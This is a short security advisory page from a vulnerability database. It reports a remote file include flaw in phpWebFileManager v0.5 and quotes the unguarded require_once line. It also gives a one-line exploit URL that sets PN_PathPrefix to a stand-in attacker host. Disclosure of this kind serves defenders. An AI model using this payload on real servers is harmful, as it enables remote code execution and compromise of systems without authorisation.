Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17652
HistoryJul 31, 2007 - 12:00 a.m.

phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability

2007-07-3100:00:00
vulners.com
17

MEFISTO PreSents…

Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once $PN_PathPrefix . 'functions.inc.php'; <<==== it's not defined


Exploit: index.php?PN_PathPrefix=http://attacker.txt?


Tnx:H0tturk,Ajann,Dumenci,Str0ke